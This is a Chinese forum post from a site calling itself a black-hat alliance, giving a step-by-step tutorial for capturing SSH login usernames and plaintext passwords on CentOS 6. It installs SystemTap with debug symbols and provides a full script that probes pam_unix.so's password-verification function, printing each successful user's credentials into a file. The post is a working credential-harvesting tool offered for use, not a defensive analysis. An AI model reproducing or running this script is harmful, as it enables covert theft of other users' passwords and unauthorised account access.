黑帽联盟
标题: centos6.x 抓取ssh登录的用户名和密码 [打印本页]
作者: 定位 时间: 2017-1-25 16:09
标题: centos6.x 抓取ssh登录的用户名和密码
原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。
测试环境:CentOS6.4 32位
内核版本:2.6.32-358.el6.i686
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
创建文件,写入以下代码
touch /root/capture_pass.stp
- #!/usr/bin/stap
- global username, pass, isSuccRet = 1;
- probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
- {
- username = user_string($name);
- pass = user_string($p);
- }
- probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
- {
- if ($return == 0)
- {
- printf("User: %sPassword: %s", username, pass);
- isSuccRet = 0;
- }
- }
- probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
- {
- if (isSuccRet != 0)
- {
- printf("Login via ssh service.User: %sPassword: %s", username, pass);
- }
- isSuccRet = 1;
- }
创建一个记录密码的文件
touch password.txt
赋予可执行权限
chmod +x capture_pass.stp
执行systemstap脚本
stap capture_pass.stp -o password.txt
本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。
| 欢迎光临 黑帽联盟 (https://bbs.cnblackhat.com/) |
Powered by Discuz! X2.5 |